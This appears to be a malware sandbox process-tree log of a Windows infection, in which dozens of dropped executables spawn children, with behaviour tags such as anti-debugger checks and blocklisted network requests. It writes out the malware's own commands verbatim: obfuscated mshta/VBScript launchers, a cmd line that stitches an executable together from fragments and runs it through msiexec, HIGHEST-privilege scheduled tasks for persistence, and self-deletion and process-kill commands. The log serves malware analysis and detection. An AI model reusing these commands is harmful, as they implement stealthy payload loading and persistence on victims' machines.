C:\Users\Admin\Pictures\Adobe Films\m65n_w3rGTQHMRdhjZEt34AM.exe"C:\Users\Admin\Pictures\Adobe Films\m65n_w3rGTQHMRdhjZEt34AM.exe"4⤵PID:2728
-
-
C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"4⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\is-M9F2I.tmp\QP5JjEmOTRwEfS1PGyZBtLEe.tmp"C:\Users\Admin\AppData\Local\Temp\is-M9F2I.tmp\QP5JjEmOTRwEfS1PGyZBtLEe.tmp" /SL5="$102C6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"5⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\is-V7U4T.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-V7U4T.tmp\lakazet.exe" /S /UID=27096⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\54-c314b-afd-bc69c-0edf7316fc4d3\Fanulukeni.exe"C:\Users\Admin\AppData\Local\Temp\54-c314b-afd-bc69c-0edf7316fc4d3\Fanulukeni.exe"7⤵PID:676
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"4⤵PID:6132
-
C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe" -u5⤵PID:3808
-
-
-
C:\Users\Admin\Pictures\Adobe Films\T83J5ZnzUDjn4_QClZDSO1Jv.exe"C:\Users\Admin\Pictures\Adobe Films\T83J5ZnzUDjn4_QClZDSO1Jv.exe"4⤵PID:6048
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4900
-
-
-
C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"2⤵
- Executes dropped EXE
PID:1184 -
C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"3⤵PID:4464
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe"C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe"2⤵
- Executes dropped EXE
PID:1236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im sjP2NNGLkLXmtRLr84FTXoXx.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sjP2NNGLkLXmtRLr84FTXoXx.exe /f4⤵
- Kills process with taskkill
PID:5764
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZtQmi64xfNHBdyzqDnGYn0w1.exe"C:\Users\Admin\Pictures\Adobe Films\ZtQmi64xfNHBdyzqDnGYn0w1.exe"2⤵
- Executes dropped EXE
PID:2584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6603⤵
- Program crash
PID:1536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6403⤵
- Program crash
PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6883⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 8603⤵
- Program crash
PID:5008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6763⤵
- Program crash
PID:4252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 11163⤵
- Program crash
PID:4380
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4a_srNM9UohMmVM9bKpDSGS4.exe"C:\Users\Admin\Pictures\Adobe Films\4a_srNM9UohMmVM9bKpDSGS4.exe"2⤵
- Executes dropped EXE
PID:1180
-
-
C:\Users\Admin\Pictures\Adobe Films\Rn16AjUDOEUw_Phj5cpEWNW3.exe"C:\Users\Admin\Pictures\Adobe Films\Rn16AjUDOEUw_Phj5cpEWNW3.exe"2⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Roaming\4804460.exe"C:\Users\Admin\AppData\Roaming\4804460.exe"3⤵PID:5108
-
-
C:\Users\Admin\AppData\Roaming\8470958.exe"C:\Users\Admin\AppData\Roaming\8470958.exe"3⤵PID:3488
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Roaming\736162.exe"C:\Users\Admin\AppData\Roaming\736162.exe"3⤵PID:4392
-
-
C:\Users\Admin\AppData\Roaming\7442260.exe"C:\Users\Admin\AppData\Roaming\7442260.exe"3⤵PID:4728
-
C:\Users\Admin\AppData\Roaming\4836048.exe"C:\Users\Admin\AppData\Roaming\4836048.exe"4⤵PID:4772
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: CLOSe ( CREateoBjECt ("WscrIPT.ShELl" ). RuN("cmd /R COpy /Y ""C:\Users\Admin\AppData\Roaming\4836048.exe"" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF """" == """" for %v iN ( ""C:\Users\Admin\AppData\Roaming\4836048.exe"" ) do taskkill -IM ""%~NXv"" /F " , 0, TRuE) )5⤵PID:1248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COpy /Y "C:\Users\Admin\AppData\Roaming\4836048.exe" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF "" == "" for %v iN ("C:\Users\Admin\AppData\Roaming\4836048.exe" ) do taskkill -IM "%~NXv" /F6⤵PID:3888
-
C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exEUvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E7⤵PID:5284
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: CLOSe ( CREateoBjECt ("WscrIPT.ShELl" ). RuN("cmd /R COpy /Y ""C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE"" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF ""-pkJzup02N2uLj2E "" == """" for %v iN ( ""C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE"" ) do taskkill -IM ""%~NXv"" /F " , 0, TRuE) )8⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COpy /Y "C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF "-pkJzup02N2uLj2E " == "" for %v iN ("C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE" ) do taskkill -IM "%~NXv" /F9⤵PID:5568
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipT: Close ( creatEobJEcT ( "wsCriPT.ShEll"). RUn( "cMd.Exe /C echO dPPgqC:\Users\Admin\AppData\RoamingJfp> ubQM.U & eCho | sET /P = ""MZ"" > aDE8.34 & CopY /B /y aDe8.34 + GCB~m_.PJ+ NrTw.Mq + Y14qE.K + CPWM.WE + BAN3N.L + uBQM.u LSSVZU.yk~ &StArt msiexec -y .\LsSVZU.yK~ " ,0, trUe) )8⤵PID:5844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C echO dPPgqC:\Users\Admin\AppData\RoamingJfp> ubQM.U & eCho | sET /P = "MZ" > aDE8.34& CopY /B /y aDe8.34 +GCB~m_.PJ+ NrTw.Mq+Y14qE.K + CPWM.WE + BAN3N.L+ uBQM.u LSSVZU.yk~ &StArt msiexec -y .\LsSVZU.yK~9⤵PID:5148
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "10⤵
- Blocklisted process makes network request
PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>aDE8.34"10⤵PID:5796
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y .\LsSVZU.yK~10⤵PID:5620
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "4836048.exe" /F7⤵
- Kills process with taskkill
PID:5612
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\7816279.exe"C:\Users\Admin\AppData\Roaming\7816279.exe"4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Roaming\6628600.exe"C:\Users\Admin\AppData\Roaming\6628600.exe"3⤵PID:4756
-
-
C:\Users\Admin\AppData\Roaming\5530473.exe"C:\Users\Admin\AppData\Roaming\5530473.exe"3⤵PID:4660
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sxrRrick3gD4kfxFesJBiP0k.exe"C:\Users\Admin\Pictures\Adobe Films\sxrRrick3gD4kfxFesJBiP0k.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:676 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:2404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5160
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PeRBFnMEUcYITSFocoY9fLRF.exe"C:\Users\Admin\Pictures\Adobe Films\PeRBFnMEUcYITSFocoY9fLRF.exe"2⤵
- Executes dropped EXE
PID:1448
-
-
C:\Users\Admin\Pictures\Adobe Films\jBWeyRHTi62HuqZULFmHBJZQ.exe"C:\Users\Admin\Pictures\Adobe Films\jBWeyRHTi62HuqZULFmHBJZQ.exe"2⤵
- Executes dropped EXE
PID:892
-
-
C:\Users\Admin\Pictures\Adobe Films\FvB0vwSDHiNEaiHHprj88QvP.exe"C:\Users\Admin\Pictures\Adobe Films\FvB0vwSDHiNEaiHHprj88QvP.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1316
-
-
C:\Users\Admin\Pictures\Adobe Films\x_aSVw4EDPeHhdDlVBUwnD5i.exe"C:\Users\Admin\Pictures\Adobe Films\x_aSVw4EDPeHhdDlVBUwnD5i.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3640 -
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵PID:1732
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"3⤵PID:684
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵
- Executes dropped EXE
PID:1104
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1232 -
C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"3⤵
- Executes dropped EXE
PID:3052
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uvSQkFfGlN4hF4GFY7NSg2XG.exe"C:\Users\Admin\Pictures\Adobe Films\uvSQkFfGlN4hF4GFY7NSg2XG.exe"2⤵
- Executes dropped EXE
PID:2640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 3963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WH0lWYx3KsYqWPkVAZlF8sNH.exe"C:\Users\Admin\Pictures\Adobe Films\WH0lWYx3KsYqWPkVAZlF8sNH.exe"2⤵
- Executes dropped EXE
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 4003⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0x6o3hs3eABLDe2nznrTWCcJ.exe"C:\Users\Admin\Pictures\Adobe Films\0x6o3hs3eABLDe2nznrTWCcJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2396
-
-
C:\Users\Admin\Pictures\Adobe Films\4XXl_o0ZoNjiS8c1uCdyespF.exe"C:\Users\Admin\Pictures\Adobe Films\4XXl_o0ZoNjiS8c1uCdyespF.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2208
-
-
C:\Users\Admin\Pictures\Adobe Films\cS1iPoHMzXj4Y6kY3A6yydrM.exe"C:\Users\Admin\Pictures\Adobe Films\cS1iPoHMzXj4Y6kY3A6yydrM.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3896
-
-
C:\Users\Admin\Pictures\Adobe Films\Ns_bc3yvvzhDnhFBWNVaCAoA.exe"C:\Users\Admin\Pictures\Adobe Films\Ns_bc3yvvzhDnhFBWNVaCAoA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1968
-
-
C:\Users\Admin\Pictures\Adobe Films\FgfMTZvTbi4wD01SGlMOF8MG.exe"C:\Users\Admin\Pictures\Adobe Films\FgfMTZvTbi4wD01SGlMOF8MG.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1964
-
-
C:\Users\Admin\Pictures\Adobe Films\jRu17kZMHmlu09jEcP7j8AiT.exe"C:\Users\Admin\Pictures\Adobe Films\jRu17kZMHmlu09jEcP7j8AiT.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 5603⤵
- Program crash
PID:4212
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:3884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SIv0sTchmQvzTnVJQD4OBmUl.exe"C:\Users\Admin\Pictures\Adobe Films\SIv0sTchmQvzTnVJQD4OBmUl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:2868
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TxDbe8aS2EdqwtmMaCuHHaCv.exe"C:\Users\Admin\Pictures\Adobe Films\TxDbe8aS2EdqwtmMaCuHHaCv.exe"2⤵
- Executes dropped EXE
PID:2308
-
-
C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"2⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\is-8H5D1.tmp\abhu1kShLo0fkEoK5LZXfLdY.tmp"C:\Users\Admin\AppData\Local\Temp\is-8H5D1.tmp\abhu1kShLo0fkEoK5LZXfLdY.tmp" /SL5="$201DA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"3⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\is-TNQAE.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-TNQAE.tmp\lakazet.exe" /S /UID=27094⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\46-90760-4ae-abfb4-3b57f2a72566d\Julenemilae.exe"C:\Users\Admin\AppData\Local\Temp\46-90760-4ae-abfb4-3b57f2a72566d\Julenemilae.exe"5⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\09-bb974-dd8-6bfa3-75ae17bb20c3f\Xaeshapaerepae.exe"C:\Users\Admin\AppData\Local\Temp\09-bb974-dd8-6bfa3-75ae17bb20c3f\Xaeshapaerepae.exe"5⤵PID:5728
-
-
C:\Program Files\Windows Multimedia Platform\VKDAEILCWR\foldershare.exe"C:\Program Files\Windows Multimedia Platform\VKDAEILCWR\foldershare.exe" /VERYSILENT5⤵PID:5536
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C72F.exeC:\Users\Admin\AppData\Local\Temp\C72F.exe1⤵PID:3700
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:3092
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6184